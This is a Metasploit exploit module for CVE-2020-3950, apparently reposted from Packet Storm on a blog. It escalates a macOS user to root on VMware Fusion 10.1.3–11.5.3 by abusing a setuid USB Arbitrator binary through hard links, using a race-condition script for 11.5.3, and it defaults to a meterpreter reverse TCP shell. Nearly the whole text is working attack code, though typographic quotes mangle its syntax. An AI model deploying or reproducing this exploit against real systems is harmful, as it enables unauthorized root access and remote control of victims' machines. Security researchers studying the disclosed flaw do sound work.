VMware Fusion USB Arbitrator Setuid Privilege Escalation ≈ Packet Storm


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::OSX::Priv
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘VMware Fusion USB Arbitrator Setuid Privilege Escalation’,
‘Description’ => %q(
This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 – 11.5.3.
The Open VMware USB Arbitrator Service can be launched outide of its standard path
which allows loading of an attacker controlled binary. By creating a payload in the
user home directory in a specific folder, and creating a hard link to the ‘Open VMware
USB Arbitrator Service’ binary, we’re able to launch it temporarily to start our payload
with an effective UID of 0.
@jeffball55 discovered an incomplete patch in 11.5.3 with a TOCTOU race.
Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
),
‘License’ => MSF_LICENSE,
‘Author’ =>
[
‘h00die’, # msf module
‘Dhanesh Kizhakkinan’, # discovery
‘Rich Mirch’, # edb module
‘jeffball <jeffball@dc949.org>’, # 11.5.3 exploit
‘grimm’
],
‘Platform’ => [ ‘osx’ ],
‘Arch’ => [ ARCH_X86, ARCH_X64 ],
‘SessionTypes’ => [ ‘shell’, ‘meterpreter’ ],
‘Targets’ => [[ ‘Auto’, {} ]],
‘Privileged’ => true,
‘References’ =>
[
[ ‘CVE’, ‘2020-3950’ ],
[ ‘EDB’, ‘48235’ ],
[ ‘URL’, ‘https://www.vmware.com/security/advisories/VMSA-2020-0005.html’ ],
[ ‘URL’, ‘https://twitter.com/jeffball55/status/1242530508053110785?s=20’ ],
[ ‘URL’, ‘https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt’ ]
],
‘DisclosureDate’ => ‘Mar 17 2020’,
‘DefaultOptions’ =>
{
‘PAYLOAD’ => ‘osx/x64/meterpreter_reverse_tcp’,
‘WfsDelay’ => 15
}
)
)

register_options [
OptInt.new(‘MAXATTEMPTS’, [true, ‘Maximum attempts to win race for 11.5.3’, 75])
]

register_advanced_options [
OptBool.new(‘ForceExploit’, [false, ‘Override check result’, false])
]
end

def open_usb_service
‘Open VMware USB Arbitrator Service’
end

def usb_service
‘VMware USB Arbitrator Service’
end

def get_home_dir
home = cmd_exec ‘echo ~’
if home.blank?
fail_with Failure::BadConfig, ‘Unable to determine home dir for shell.’
end
home
end

def content_dir
« #{get_home_dir}/Contents »
end

def base_dir
« #{content_dir}/Library/services/ »
end

def kill_process(executable)
pid_kill = cmd_exec %(ps ax | grep #{executable} | grep -v grep | awk ‘{print « kill -9  » $1}’)
cmd_exec pid_kill
end

def get_version
# Thanks to @ddouhine on github for this answer!
version_raw = cmd_exec « plutil -p ‘/Applications/VMware Fusion.app/Contents/Info.plist’ | grep CFBundleShortVersionString »
/=> « (?<version>d{0,2}.d{0,2}.d{0,2}) »/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
if version_raw.blank?
fail_with Failure::BadConfig, ‘Unable to determine VMware Fusion version. Set ForceExploit to override.’
end
Gem::Version.new(version)
end

def pre_11_5_3
# Upload payload executable & chmod
payload_filename = « #{base_dir}#{usb_service} »
print_status « Uploading Payload: #{payload_filename} »
write_file payload_filename, generate_payload_exe
chmod payload_filename, 0o755
register_file_for_cleanup payload_filename

# create folder structure and hard link to the original binary
root_link_folder = « #{get_home_dir}/#{rand_text_alphanumeric(2..5)} » # for cleanup later
link_folder = « #{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/ »
cmd_exec « mkdir -p #{link_folder} »
cmd_exec « ln ‘/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}’ ‘#{link_folder}#{open_usb_service}' »
print_status « Created folder (#{link_folder}) and link »

print_status ‘Starting USB Service (5 sec pause)’
# XXX: The ; used by cmd_exec will interfere with &, so pad it with :
cmd_exec « cd #{link_folder}; ‘#{link_folder}/#{open_usb_service}’ & : »
Rex.sleep 5 # give time for the service to execute our payload
print_status ‘Killing service’
cmd_exec « pkill ‘#{open_usb_service}' »
print_status « Deleting #{root_link_folder} »
rm_rf root_link_folder
end

def exactly_11_5_3
# Upload payload executable & chmod
payload_name = « #{base_dir}#{rand_text_alphanumeric(5..10)} »
print_status « Uploading Payload to #{payload_name} »
write_file payload_name, generate_payload_exe
chmod payload_name, 0o755
#create race with codesign check
root_link_folder = « #{get_home_dir}/#{rand_text_alphanumeric(2..5)} » # for cleanup later
link_folder = « #{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/ »
print_status ‘Uploading race condition executable.’
race = <<~EOF
#!/bin/sh
while [ « 1 » = « 1 » ]; do
ln -f ‘/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}’ ‘#{base_dir}#{usb_service}’
ln -f ‘#{payload_name}’ ‘#{base_dir}#{usb_service}’
done
EOF
racer_name = « #{base_dir}#{rand_text_alphanumeric(5..10)} »
upload_and_chmodx racer_name, race
register_file_for_cleanup racer_name
register_dirs_for_cleanup root_link_folder
# create the hard link
print_status « Creating folder (#{link_folder}) and link »
cmd_exec « mkdir -p #{link_folder} »
cmd_exec « ln ‘/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}’ ‘#{link_folder}#{open_usb_service}' »

# create the launcher to start the racer and keep launching our service to attempt to win
launcher = <<~EOF
#!/bin/sh
#{racer_name} &
for i in {1..#{datastore[‘MAXATTEMPTS’]}}
do
echo « attempt $i »;
‘#{link_folder}#{open_usb_service}’
done
EOF
runner_name = « #{base_dir}#{rand_text_alphanumeric(5..10)} »
upload_and_chmodx runner_name, launcher
register_file_for_cleanup runner_name

print_status « Launching Exploit #{runner_name} (sleeping 15sec) »
# XXX: The ; used by cmd_exec will interfere with &, so pad it with :
results = cmd_exec « #{runner_name} & : »
Rex.sleep 15 # give time for the service to execute our payload
vprint_status results

print_status ‘Exploit Finished, killing scripts.’
kill_process racer_name
kill_process runner_name # in theory should be killed already but just in case
kill_process « ‘#{link_folder}#{open_usb_service}' »
# kill_process ‘ln’ a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed.
# above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error
# rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can’t delete the folder
end

def check
unless exists? « /Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service} »
print_bad « ‘#{open_usb_service}’ binary missing »
return CheckCode::Safe
end
version = get_version
if version.between?(Gem::Version.new(‘10.1.3’), Gem::Version.new(‘11.5.3’))
vprint_good « Vmware Fusion #{version} is exploitable »
else
print_bad « VMware Fusion #{version} is NOT exploitable »
return CheckCode::Safe
end
CheckCode::Appears
end

def exploit
# First check the system is vulnerable, or the user wants to run regardless
unless check == CheckCode::Appears
unless datastore[‘ForceExploit’]
fail_with Failure::NotVulnerable, ‘Target is not vulnerable. Set ForceExploit to override.’
end
print_warning ‘Target does not appear to be vulnerable’
end

# Check if we’re already root
if is_root?
unless datastore[‘ForceExploit’]
fail_with Failure::BadConfig, ‘Session already has root privileges. Set ForceExploit to override’
end
end

# Make sure we can write our payload to the remote system
rm_rf content_dir # live dangerously.
if directory? content_dir
fail_with Filure::BadConfig, « #{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail. »
end
cmd_exec « mkdir -p #{base_dir} »
register_dirs_for_cleanup content_dir
unless writable? base_dir
fail_with Failure::BadConfig, « #{base_dir} is not writable. »
end

version = get_version
if version == Gem::Version.new(‘11.5.3’)
vprint_status ‘Using 11.5.3 exploit’
exactly_11_5_3
elsif version.between?(Gem::Version.new(‘10.1.3’), Gem::Version.new(‘11.5.2’))
vprint_status ‘Using pre-11.5.3 exploit’
pre_11_5_3
end
rm_rf content_dir # live dangerously.
end
end





Source link

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *